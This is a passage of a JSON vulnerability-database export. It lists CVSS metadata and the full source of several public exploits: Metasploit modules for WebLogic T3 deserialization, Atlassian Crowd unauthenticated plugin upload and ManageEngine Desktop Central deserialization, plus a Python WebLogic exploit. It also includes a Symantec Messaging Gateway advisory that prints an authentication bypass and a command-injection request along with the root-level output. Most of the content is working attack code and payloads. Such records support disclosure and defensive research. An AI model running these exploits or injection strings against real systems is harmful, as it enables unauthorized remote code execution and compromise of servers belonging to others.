"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-30T00:00:00", "type": "attackerkb", "title": "CVE-2019-3396", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2019-10-30T00:00:00", "id": "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "href": "https://attackerkb.com/topics/8PZOMRtIAA/cve-2019-3396", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-23T23:33:45", "description": "# citrix_adc_netscaler_lfi_scan\n\n![alt text][citrix]\n\nThis Metas...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-12T13:37:53", "type": "githubexploit", "title": "Exploit for Missing Authorization in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", 
\ndata << rand_text_alphanumeric(4).unpack('H*')[0] # new = randomized \n \ndata << '00000000' # NULL BYTES \ndata << '78' # block footer \n \nsock.put([data].pack('H*')) \nsleep(1) \nsock.get_once \nend \n \ndef send_payload_objdata \n# payload creation \nif target.name == 'Windows' \nmycmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true}) \nelsif target.name == 'Unix' || target.name == 'Solaris' \nmycmd = payload.encoded \nend \n \n# basic weblogic ClassTableEntry object (serialized) \n# TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT? \npayload = '056508000000010000001b0000005d0101007372017870737202787000000000' \npayload << '00000000757203787000000000787400087765626c6f67696375720478700000' \npayload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306' \n \npayload << 'fe010000' # ----- separator ----- \n \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \npayload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry \npayload << '73735461626c65456e747279' # (cont) \npayload << '2f52658157f4f9ed' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # remaining object header \npayload << '72' # class header \npayload << '00025b42' # Name: 0x5b42 \npayload << 'acf317f8060854e0' # serialVersionUID \npayload << '02' # SERIALIZABLE \npayload << '0000' # fieldCount = 0 \npayload << '7870' # class footer \npayload << '77' # block header \npayload << '020000' # contents = 0x0000 \npayload << '78' # block footer \n \npayload << 'fe010000' # ----- separator ----- \n \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \npayload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry \npayload << '73735461626c65456e747279' # (cont) \npayload << '2f52658157f4f9ed' # serialVersionUID \npayload << '0c' # 
EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # remaining object header \npayload << '72' # class header \n \npayload << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object; \npayload << '6563743b' # (cont) \npayload << '90ce589f1073296c' # serialVersionUID \npayload << '02' # SERIALIZABLE \npayload << '0000' # fieldCount = 0 \npayload << '7870' # remaining object header \npayload << '77' # block header \npayload << '020000' # contents = 0x0000 \npayload << '78' # block footer \n \npayload << 'fe010000' # ----- separator ----- \n \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \n \npayload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry \npayload << '73735461626c65456e747279' # (cont) \npayload << '2f52658157f4f9ed' # serialVersionUID \npayload << '0c' # SERIALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # block footer \npayload << '72' # class header \npayload << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector \npayload << 'd9977d5b803baf01' # serialVersionUID \npayload << '03' # WRITE_METHOD | SERIALIZABLE \npayload << '0003' # fieldCount = 3 \npayload << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement \npayload << '49000c656c656d656e74436f756e74' # 1: Int: elementCount \npayload << '5b000b656c656d656e7444617461' # 2: Array: elementData \npayload << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object; \npayload << '743b' # (cont) \npayload << '7870' # remaining object header \npayload << '77' # block header \npayload << '020000' # contents = 0x0000 \npayload << '78' # block footer \n \npayload << 'fe010000' # ----- separator ----- \n \nysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload(\"CommonsCollections1\",mycmd) \npayload << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join \n \npayload << 
'fe010000' # ----- separator ----- \n \n# basic weblogic ImmutableServiceContext object (serialized) \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \npayload << '00257765626c6f6769632e726a766d2e496d6d75' # Name: weblogic.rjvm.ImmutableServiceContext \npayload << '7461626c6553657276696365436f6e74657874' # (cont) \npayload << 'ddcba8706386f0ba' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '78' # object footer \npayload << '72' # block header \npayload << '00297765626c6f6769632e726d692e70726f76' # Name: weblogic.rmi.provider.BasicServiceContext \npayload << '696465722e426173696353657276696365436f' # (cont) \npayload << '6e74657874' # (cont) \npayload << 'e4632236c5d4a71e' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # block footer \npayload << '77' # block header \npayload << '020600' # contents = 0x0600 \npayload << '7372' # class descriptor \npayload << '00267765626c6f6769632e726d692e696e7465' # Name: weblogic.rmi.internal.MethodDescriptor \npayload << '726e616c2e4d6574686f644465736372697074' # (cont) \npayload << '6f72' # (cont) \npayload << '12485a828af7f67b' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # class footer \npayload << '77' # class data \n \n#payload << '34002e61757468656e746963617465284c7765' # old contents = 0x002e61757468656e746963617465284c7765 \n#payload << '626c6f6769632e73656375726974792e61636c' # 626c6f6769632e73656375726974792e61636c \n#payload << '2e55736572496e666f3b290000001b' # 2e55736572496e666f3b290000001b \npayload << rand_text_alphanumeric(52).unpack('H*')[0] # new = randomized \npayload << '78' # class footer \npayload << '78' # block footer \n# MISSING OBJECT FOOTER (0x78) \n \npayload << 'fe00ff' # this cruft again. 
some kind of footer \n \n# sets the length of the stream \ndata = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0') \ndata << payload \n \nsock.put([data].pack('H*')) \nsleep(1) \nsock.get_once \n \nend \n \ndef exploit \nconnect \n \nprint_status('Sending handshake...') \nt3_handshake \n \nprint_status('Sending T3 request object...') \nbuild_t3_request_object \n \nprint_status('Sending client object payload...') \nsend_payload_objdata \n \nhandler \ndisconnect \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152268/weblogic_deserialize_rawobject.rb.txt"}, {"lastseen": "2021-08-12T16:10:28", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "packetstorm", "title": "Atlassian Crowd pdkinstall Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2021-08-12T00:00:00", "id": "PACKETSTORM:163810", "href": 
"https://packetstormsecurity.com/files/163810/Atlassian-Crowd-pdkinstall-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE', \n'Description' => %q{ \nThis module can be used to upload a plugin on Atlassian Cloud via \nthe pdkinstall development plugin as an unauthenticated attacker. \nThe payload is uploaded as a JAR archive containing a servlet using \na POST request to /crowd/admin/uploadplugin.action. The check command will \ncheck that the /crowd/admin/uploadplugin.action page exists and that it \nresponds appropriately to determine if the target is vulnerable or not. \n}, \n'Author' => [ \n'Paul', # Vulnerability discovery \n'Corben Leo', # PoC and Vulnerability Writeup. @hacker_ on Twitter. \n'Grant Willcox' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2019-11580'], \n['URL', 'https://jira.atlassian.com/browse/CWD-5388'], \n['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'], \n['URL', 'https://www.corben.io/atlassian-crowd-rce/'] \n], \n'Platform' => %w[java], \n'Arch' => ARCH_JAVA, \n'DefaultOptions' => { \n'HttpClientTimeout' => 25 # Allow a bit more time for the file upload to complete, just in case things are delayed, before timing out. 
\n}, \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ] \n}, \n'Targets' => \n[ \n[ \n'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n} \n] \n], \n'DisclosureDate' => '2019-05-22' \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8095), \nOptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/']), \n \n] \n) \nend \n \ndef upload_plugin(content) \ndata = Rex::MIME::Message.new \ndata.add_part(content, nil, 'binary', \"form-data; name=\\\"file_#{Rex::Text.rand_text_alpha(8..12)}\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(8..12)}.jar\\\"\") \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'), \n'method' => 'POST', \n'data' => data.to_s, \n'ctype' => \"multipart/mixed; boundary=#{data.bound}\" \n}, datastore['HttpClientTimeout']) \nend \n \ndef generate_plugin_jar \nname = Rex::Text.rand_text_alpha(8..12) \nservlet_name = Rex::Text.rand_text_alpha(8..12) \natlassian_plugin_xml = %( \n<atlassian-plugin key=\"metasploit.PayloadServlet\" name=\"#{name}\" plugins-version=\"2\" class=\"metasploit.PayloadServlet\"> \n<plugin-info> \n<param name=\"atlassian-data-center-compatible\">true</param> \n<description></description> \n<version>1.0.0</version> \n</plugin-info> \n \n<servlet name=\"#{servlet_name}\" key=\"#{servlet_name}\" class=\"metasploit.PayloadServlet\"> \n<url-pattern>/#{name}</url-pattern> \n<description>#{Faker::App.name}</description> \n</servlet> \n</atlassian-plugin> \n) \n \n# Generates .jar file for upload \nzip = payload.encoded_jar \nzip.add_file('atlassian-plugin.xml', atlassian_plugin_xml) \n \nservlet = MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class') \nzip.add_file('/metasploit/PayloadServlet.class', servlet) \n \ncontents = zip.pack \n[contents, name] \nend \n \ndef check \nprint_status('Sending a test request to try installing an invalid plugin to 
see if the server is vulnerable...') \nres = upload_plugin(Rex::Text.rand_text_alpha(45..120)) \nif res.nil? \nCheckCode::Unknown('Was not able to connect to the target!') \nelsif (res.body =~ /Unable to install plugin/) && (res.code == 400) \nCheckCode::Vulnerable(\"Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!\") \nelse \nCheckCode::Safe(\"Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!\") \nend \nend \n \ndef exploit \nprint_status('Generating a malicious JAR plugin...') \ncontent, plugin_name = generate_plugin_jar \nprint_status('Uploading the malicious JAR plugin...') \nupload_plugin(content) \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, \"/plugins/servlet/#{plugin_name}\"), \n'method' => 'GET' \n}, datastore['HttpClientTimeout']) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/163810/atlassian_crowd_pdkinstall_plugin_upload_rce.rb.txt"}, {"lastseen": "2020-03-14T22:50:18", "description": "", "cvss3": {}, "published": "2020-03-14T00:00:00", "type": "packetstorm", "title": "ManageEngine Desktop Central Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-14T00:00:00", "id": "PACKETSTORM:156730", "href": "https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 
'ManageEngine Desktop Central Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in the \ngetChartImage() method from the FileStorage class within ManageEngine \nDesktop Central versions < 10.0.474. Tested against 10.0.465 x64. \n \n\"The short-term fix for the arbitrary file upload vulnerability was \nreleased in build 10.0.474 on January 20, 2020. In continuation of that, \nthe complete fix for the remote code execution vulnerability is now \navailable in build 10.0.479.\" \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-10189'], \n['URL', 'https://srcincite.io/advisories/src-2020-0011/'], \n['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], \n['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], \n['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] \n], \n'DisclosureDate' => '2020-03-05', # 0day release \n'License' => MSF_LICENSE, \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd \n], \n['Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper \n], \n['PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'RPORT' => 8383, \n'SSL' => true, \n'WfsDelay' => 60 # It can take a little while to trigger \n}, \n'CmdStagerFlavor' => 'certutil', # This works without issue \n'Notes' => { \n'PatchedVersion' => Gem::Version.new('100474'), \n'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page? 
\n'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'configurations.do') \n) \n \nunless res \nreturn CheckCode::Unknown('Target is not responding to check') \nend \n \nunless res.code == 200 && res.body.include?('ManageEngine Desktop Central') \nreturn CheckCode::Unknown('Target is not running Desktop Central') \nend \n \nversion = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text \n \nunless version \nreturn CheckCode::Detected('Could not detect Desktop Central version') \nend \n \nvprint_status(\"Detected Desktop Central version #{version}\") \n \nif Gem::Version.new(version) < notes['PatchedVersion'] \nreturn CheckCode::Appears(\"#{version} is an exploitable version\") \nend \n \nCheckCode::Safe(\"#{version} is not an exploitable version\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# XXX: An executable is required to run arbitrary commands \ncmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper \n \nvprint_status(\"Serializing command: #{cmd}\") \n \n# I identified mr_me's binary blob as the CommonsBeanutils1 payload :) \nserialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( \n'CommonsBeanutils1', \ncmd \n) \n \n# XXX: Patch in expected serialVersionUID \nserialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\" \n \n# 
Rock 'n' roll! \nupload_serialized_payload(serialized_payload) \ndeserialize_payload \nend \n \ndef upload_serialized_payload(serialized_payload) \nprint_status('Uploading serialized payload') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/mdm/client/v1/mdmLogUploader'), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart', \n'filename' => 'logger.zip' \n}, \n'data' => serialized_payload \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') \nend \n \nprint_good('Successfully uploaded serialized payload') \n \n# C:\\Program Files\\DesktopCentral_Server\\bin \nregister_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip') \nend \n \ndef deserialize_payload \nprint_status('Deserializing payload') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'cewolf/'), \n'vars_get' => {'img' => '\\\\logger.zip'} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not deserialize payload') \nend \n \nprint_good('Successfully deserialized payload') \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156730/desktopcentral_deserialization.rb.txt"}, {"lastseen": "2017-08-22T15:20:25", "description": "", "cvss3": {}, "published": "2017-08-18T00:00:00", "type": "packetstorm", "title": "Symantec Messaging Gateway 10.6.3-2 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-6327"], "modified": "2017-08-18T00:00:00", "id": "PACKETSTORM:143821", "href": "https://packetstormsecurity.com/files/143821/Symantec-Messaging-Gateway-10.6.3-2-Remote-Code-Execution.html", "sourceData": "`Hello, \n \nThis is an advisory for CVE-2017-6327 which is an unauthenticated remote \ncode 
execution flaw in the web interface of Symantec Messaging Gateway \nprior to and including version 10.6.3-2, which can be used to execute \ncommands as root. \n \nSymantec Messaging Gateway, formerly known as Brightmail, is a linux-based \nanti-spam/security product for e-mail servers. It is deployed as a physical \ndevice or with ESX in close proximity to the servers it is designed to \nprotect. \n \n=*=*=*=*=*=*=*=*= TIMELINE \n \n2017-07-07: Reported to Symantec \n2017-08-10: Patch and notice released by Symantec [1] \n2017-08-18: Public technical advisory \n \n=*=*=*=*=*=*=*=*= DESCRIPTION \n \n- Bug #1: Web authentication bypass \n \nThe web management interface is available via HTTPS, and you can't do much \nwithout logging in. \n \nIf the current session (identified by the `JSESSIONID` cookie) has the \n`user` attribute set, the session is considered authenticated. \n \nThe file LoginAction.class defines a number of public methods and they can \nall be reached via unauthenticated web requests. \n \nBy making a GET request to `/brightmail/action1.do?method=method_name` we \ncan execute `LoginAction.method_name` if `method_name` is a public method. \n \nOne such public method which will be the target of our authentication \nbypass is called `LoginAction.notificationLogin`. \n \nIt does the following: \n \n1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt` \n2. Creates a new `UserTO` object using the decrypted `notify` parameter as \nan email value \n3. Creates a new session, invalidating the old one if necessary \n4. Sets the `user` attribute of the newly created session to our \nconstructed UserTO object \n \nIt essentially takes a username value from a GET parameter and logs you in \nas this user if it exists. If not, it creates this user for you. \n \nWe need to encrypt our `notify` argument so that \n`BrightmailDecrypt.decrypt` will decrypt it properly. 
Fortunately the \nencryption is just PBEWithMD5AndDES using a static password, conveniently \nincluded in the code itself. I won't include the encryption password or a \nfully encrypted notify string in this post. \n \n \nExample request: \n \nGET \n/brightmail/action1.do?method=notificationLogin¬ify=MTIzNDU2Nzg%3d6[...]&id=test \nHTTP/1.1 \n... \n \n \nHTTP/1.1 302 Found \nServer: Apache-Coyote/1.1 \n... \nSet-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail; \nSecure; HttpOnly \n \n \n- Bug #2: Command injection \n \nThe RestoreAction.performRestore method can be reached with an \nauthenticated session and it takes the restoreSource and \nlocalBackupFilename parameters. \n \nAfter a long chain of function calls, localBackupFilename ends up being \nsent to the local \"bmagent\" daemon listening on port 41002. It will execute \n/opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied \nvalue. \n \nThe db-restore script is a sudo wrapper for \n/opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl \nscript containing a command injection in a call to /usr/bin/du. \n \n$ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;\"`id`\";' \n/usr/bin/du: cannot access `/data/backups/asdf': No such file or directory \nsh: uid=0(root) gid=0(root) groups=0(root): command not found \nERROR: Failed to copy 'asdf;\"`id`\";' from local backup store: No such file \nor directory \n \n \nThis command injection can be exploited from the web management interface \nwith a valid session, which we can create using bug #1. \n \n- Combining bug #1 and #2 \n \nThe last step is to get a CSRF token since the vulnerable performRestore \nfunction is annotated with @CSRF. \n \nAfter some quick digging it turns out that all you need to do is call \n/brightmail/common.jsp to get a token that will be valid for all your \nrequests. 
\n \nThe URL-encoded value we provide for the `localBackupFileSelection` \nparameter is: \nasdf`id>/data/bcc/webapps/brightmail/output.txt;/bin/uname \n-a>>/data/bcc/webapps/brightmail/output.txt`hehehe \n \nRequest: \n \nGET \n/brightmail/admin/restore/action5.do?method=performRestore&symantec.brightmail.key.TOKEN=bbda9b0a52bca4a43cc2b6051cd6b95900068cd3&restoreSource=APPLIANCE&localBackupFileSelection=%61%73%64%66%60%69%64%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%3b%2f%62%69%6e%2f%75%6e%61%6d%65%20%2d%61%3e%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%60%68%65%68%65%68%65 \nHTTP/1.1 \nHost: 192.168.205.220 \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) \nGecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate, br \nCookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \nResponse: \n \nHTTP/1.1 200 OK \nServer: Apache-Coyote/1.1 \nCache-Control: no-store,no-cache \nPragma: no-cache \nExpires: Thu, 01 Jan 1970 00:00:00 GMT \nX-Frame-Options: SAMEORIGIN \nContent-Type: text/html;charset=UTF-8 \nContent-Length: 803 \nDate: Thu, 29 Jun 2017 06:48:12 GMT \nConnection: close \n \n<HTML> \n<title>Symantec Messaging Gateway - Restore</title> \n... \n \n \nNow to confirm that our command output was correctly placed in a file \ninside the webroot. \n \nimac:~% curl -k https://192.168.205.220/brightmail/output.txt \nuid=0(root) gid=0(root) groups=0(root) \nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 \n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux \n \n \n=*=*=*=*=*=*=*=*= EXPLOIT OUTPUT \n \nimac:~/brightmail% python brightmail-rce.py \nhttps://192.168.205.220/brightmail \nbypassing login.. 
\n* JSESSIONID=693079639299816F80016123BE8A0167 \nverifying login bypass.. \n* Version: 10.6.3 \ngetting csrf token.. \n* 1e35af8c567d3448a65c8516a835cec30b6b8b73 \ndone, verifying.. \n \nuid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root) \ngroups=0(root),99(nobody),499(mysql),502(bcc) \nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 \n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux \n \n \n# cat /etc/issue \n \nSymantec Messaging Gateway \nVersion 10.6.3-2 \nCopyright (c) 1998-2017 Symantec Corporation. All rights reserved. \n \n \n=*=*=*=*=*=*=*=*= REFERENCES \n \n[1] \nhttps://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00 \n \n=*=*=*=*=*=*=*=*= CREDIT \n \nPhilip Pettersson \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/143821/symantecmg-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-09-29T22:20:57", "description": "", "cvss3": {}, "published": "2017-09-29T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic Server Java Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2017-09-29T00:00:00", "id": "PACKETSTORM:144405", "href": "https://packetstormsecurity.com/files/144405/Oracle-WebLogic-Server-Java-Deserialization-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution] \n# Date: [27/09/2017] \n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot \n# Vulnerability Author: FoxGloveSecurity \n# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html] \n# Affetcted Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0] \n# Tested on: [Oracle WebLogic Server version 10.3.6.0 running on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr] \n# CVE : [CVE-2015-4852] \n \n''' \nThis 
exploit tests the target Oracle WebLogic Server for Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send \nPing requests to attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful. \nFeel free to modify the payload(chunk2) with that of your choice. Don't worry about modiyfing the payload length each time you change the payload as \nthis script will do it for you on the fly. \n''' \n \n#!/usr/bin/env python \nimport socket \nimport sys \nimport struct \nfrom binascii import unhexlify \n \nprint \"\\n[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit...\" \nprint \"[+]Here is the command:\\n\\t tcpdump -nni <eth-adapter> -e icmp[icmptype] == 8\\n\" \n \nif len(sys.argv) < 2: \nprint \"\\n[+]Please provide target IP and Port...\" \nprint \"[+]Usage:\\n\\t ./weblogic_linuxPing.py <target_ip> <target_port>\" \nsys.exit() \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nserver_address = (sys.argv[1], int(sys.argv[2])) \nprint '[+]Connecting to %s port %s' % server_address \nsock.connect(server_address) \n \n#Send headers \nheaders='t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\nPU:t3://us-l-breens:7001\\n\\n' \nprint '[+]Sending\\n\"%s\"' % headers \nsock.sendall(headers) \n \ndata = sock.recv(1024) \nprint >>sys.stderr, 